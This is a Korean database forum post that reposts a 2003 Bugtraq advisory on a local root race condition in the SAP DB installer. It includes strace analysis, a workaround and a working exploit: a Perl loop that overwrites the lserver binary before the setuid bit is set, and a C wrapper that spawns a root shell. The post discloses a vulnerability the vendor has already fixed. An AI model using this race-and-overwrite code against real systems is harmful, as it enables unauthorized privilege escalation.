database.sarang.net
UserID
Passwd
Database
DBMS
ㆍMySQL
PostgreSQL
Firebird
Oracle
Informix
Sybase
MS-SQL
DB2
Cache
CUBRID
LDAP
ALTIBASE
Tibero
DB 문서들
스터디
Community
공지사항
자유게시판
구인|구직
DSN 갤러리
도움주신분들
Admin
운영게시판
최근게시물
MySQL News 23506 게시물 읽기
 News | Q&A | Columns | Tutorials | Devel | Files | Links
No. 23506
SAPDB 의 local root 의 취약점
작성자
정재익(advance)
작성일
2003-05-16 09:05
조회수
7,181

안녕하십니까?

쓰지는 않지만 관심있게 보고 있던 SAPDB인데 취약점이 발표 됐네요

맬리스트 보시는 분들은 알겠지만 혹시나 해서요.

Date: Wed, 7 May 2003 12:06:48 -0400 (EDT)

To: <bugtraq@securityfocus.com>

 

 

 

This is an older (moot) vulnerability that I discovered which was never

released, the vendor has fixed it. It is similar to what KF at snosoft

discovered recently in the current version of SAPDB.

 

 

 

Vapid Labs

SAP database local root vulnerability during installation.

December 10, 2002

 

 

I. BACKGROUND

 

 

SAP DB is a Free Enterprise database (http://www.sapdb.org). An

exploitable race condition exists during installation that can be won to

yield root to a local malicous user. An executable is world writeable

before a setuid bit is set by the installation program. This condition

exists for both the production version 7.3.0.29 and the beta version

7.4.3.7 beta (www.sapdb.org/tgz_linux.htm).

 

 

 

II. DESCRIPTION

 

 

Installation of the SAP database is done by the binary SDBINST. This

first uncompresses the files, changes permissions and then runs a file

integrity check. Once this check is completed setuid bits are added to

two files. A large gap between this check and the setuid operation exists

(a few seconds at i least). This gives us ample time to change the

contents of the pre-setuid file.

 

 

For the production 7.3.0.29 version:

 

 

Before the setuid root bit is set, a log file is written to that a normal

non-privilidged user can read. This file was located in

/tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/.

We simply watch that file for what is written to it just before the call

to chmod and copy our malicious code over the target binary.

 

 

 

Below is a partial analysis of SDBINST.

 

 

chmod(\"/usr/sapdb/depend/pgm/lserver\", 0100777) = 0

 

 

.

.

.

 

 

open(\"/tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST7aad69a8$O_WRONLY|O_CREAT|O_TRUNC,

0666) = 3

fstat64(3, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0

fcntl64(0x3, 0x2, 0x1, 0x401a6ce0) = 0

fstat64(3, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,

0) = 0x40024000

write(3, \"\"lib/libsqlca.a\" f1d67919f97aa15\"..., 4096) = 4096

write(3, \"/PRECOM.ins\" 6e00ace2afd80ec50a1\"..., 4096) = 4096

 

 

.

.

 

 

chmod(\"/usr/sapdb/depend/pgm/lserver\", 04775) = 0

 

 

 

For the Beta 7.4.3.7 version:

 

 

All of the files are checked for data integrity before the setuid bit is

set, the installation no longer writes to a log file during this

operation. It appears that just before the setuid bit is set a directory

is created /opt/sapdb/depend/wrk. It proved more difficult to win the

race using this directory creation as an indicator to copy our file over.

I was able to win the race with a timed copy after the last file had been

written from the archive and just before the integrity check had finished.

 

 

Below is an analysis of the installation program SDBRUN.

 

 

chmod(\"/opt/sapdb/depend/pgm/lserver\", 0777) = 0

.

.

 

 

20224 stat64(\"/opt/sapdb/depend/wrk\", 0x8150c20) = -1 ENOENT (No such file

or directory)

20224 stat64(\"/opt/sapdb/depend\", {st_mode=S_IFDIR|0775, st_size=4096,

...}) = 020224 mkdir(\"/opt/sapdb/depend/wrk\", 0775) = 0

20224 chmod(\"/opt/sapdb/depend/wrk\", 0775) = 0

20224 stat64(\"/opt/sapdb/depend/wrk\", {st_mode=S_IFDIR|0775, st_size=4096,

...}) = 0

20224 chown32(0x872b640, 0x5456, 0x5456) = 0

20224 chown32(0x88c3f88, 0, 0x5456) = 0

20224 chmod(\"/opt/sapdb/depend/pgm/dbmsrv\", 04775) = 0

20224 chown32(0x88c4870, 0, 0x5456) = 0

20224 chmod(\"/opt/sapdb/depend/pgm/lserver\", 04775) = 0

 

 

 

 

III. ANALYSIS

 

 

Local attackers can exploit this vulnerability to gain root access

on a targeted system. The attacker would have needed previous knowledge

of the system administrators SAP installation. To exploit the 7.4 beta

version of this software an attacker would need to have a good idea of the

target systems hardware type and speed.

 

 

 

IV. EXPLOIT

 

 

#!/bin/perl

 

 

while (1) {

 

 

$test =`grep -sh PRECOM.ins

/tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST*`;

 

 

if ( $test =~ /PRECOM/ ) {

system(\"cp /home/lwc/run /usr/sapdb/depend/pgm/lserver\");

exit(1);

}

 

 

}

 

 

 

The code we would rather have in place is:

 

 

---- run.c -----

/*##Larry W. Cashdollar, lwc@vapid.dhs.org

*##This is just a wrapper to boost our privs from euid(0) to uid(0)

guid(0 */

 

 

#include <stdio.h>

#include <unistd.h>

 

 

 

int

main (void)

{

char *shell[2];

shell[0] = \"sh\";

shell[1] = NULL;

if (!setreuid (0, 0))

printf (\"We have root, getting sgid perms and spawning shell.\n\");

else

{

printf (\"Ack, We lost the race.\n\");

_exit (0);

}

setregid (0, 0);

execve (\"/bin/sh\", shell, NULL);

return(0);

}

------ run.c --------

 

 

 

V. DETECTION

 

 

sapdb-server-linux-32bit-i386-7_3_0_29, sapdb-all-linux-32bit-i386-7_4_3_7

are the versions I used.

 

 

VI. WORKAROUND

 

 

Boot the system into single user mode only and ensure no other users are

logged in during installation.

 

 

VII. VENDOR FIX

 

 

The vendor was never notified, and this issue was fixed in the latest

release.

 

 

VIII. CVE INFORMATION

 

 

The Mitre Corp.\'s Common Vulnerabilities and Exposures (CVE) Project

has not assigned an identification number to this issue.

 

 

IX. CREDIT

 

 

Larry W. Cashdollar (http://vapid.dhs.org) discovered this vulnerability.

[Top]
No.
제목
작성자
작성일
조회
23753MySQL 4.1.12 has been released!!
이경환
2005-05-16
11493
23666MySQL QUery Browser 1.1.7 has been released.
이경환
2005-05-03
8470
23507New MaxDB 7.6 bata released
이창민
2005-03-09
8172
23506SAPDB 의 local root 의 취약점
정재익
2003-05-16
7181
23505sap-db-data-access (8972)
정재익
2002-08-09
6823
23299MySQL 4.1.10a and 4.0.24 Released
이창민
2005-03-14
8262
23220MySQL 4.1.10 has been released
이창민
2005-03-02
6954
Valid XHTML 1.0!
All about the DATABASE... Copyleft 1999-2023 DSN, All rights reserved.
작업시간: 0.048초, 이곳 서비스는
	PostgreSQL v16.1로 자료를 관리합니다